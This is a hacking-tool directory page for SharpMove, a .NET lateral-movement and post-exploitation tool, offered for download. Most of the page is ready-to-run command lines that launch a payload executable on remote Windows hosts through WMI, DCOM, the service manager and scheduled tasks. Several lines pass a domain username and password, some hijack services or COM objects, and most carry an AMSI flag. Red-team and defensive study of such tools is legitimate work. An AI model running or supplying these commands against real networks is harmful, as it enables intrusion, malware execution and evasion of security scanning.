Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
SharpMove — .NET Project for performing Authenticated Remote Execution | Kitploit
Tools/GitHubGitHub/0xthirteen/sharpmove
Lateral MovementPost-ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHub0xthirteen/sharpmove

SharpMove

.NET Project for performing Authenticated Remote Execution

View Repository
410703 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

SharpMove - .NET authenticated execution for remote hosts

Building

To compile open Visual Studio project and compile for release.

Options

  • WMI
  • SCM
  • DCOM (Multiple)
  • Task Scheduler
  • Service DLL Hijack
  • DCOM Server Hijack
  • Modify Scheduled Task
  • Modify Service binpath
root@kitploit:~
SharpMove.exe action=query computername=remote.host.local query="select * from win32_process" username=domain\user password=password
root@kitploit:~
SharpMove.exe action=create computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true username=domain\user password=password
root@kitploit:~
SharpMove.exe action=executevbs computername=remote.host.local eventname=Debug amsi=true username=domain\\user password=password
root@kitploit:~
SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password
root@kitploit:~
SharpMove.exe action=dcom computername=remote.host.local command="C:\windows\temp\payload.exe\" method=ShellBrowserWindow amsi=true
root@kitploit:~
SharpMove.exe action=scm computername=remote.host.local command="C:\windows\temp\payload.exe" servicename=WindowsDebug amsi=true
root@kitploit:~
SharpMove.exe action=modsvc computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true servicename=TestService
root@kitploit:~
SharpMove.exe action=modschtask computername=remote.host.local command="C:\windows\temp\payload.exe" username=domain\user password=password taskname=TestTask
root@kitploit:~
SharpMove.exe action=hijackdcom computername=remote.host.local clsid={40bdc4e5-d532-42e6-b667-1ab890fdebcf}
root@kitploit:~
SharpMove.exe action=startservice computername=remote.host.local servicename=TestService

Part of MoveKit

Download Tool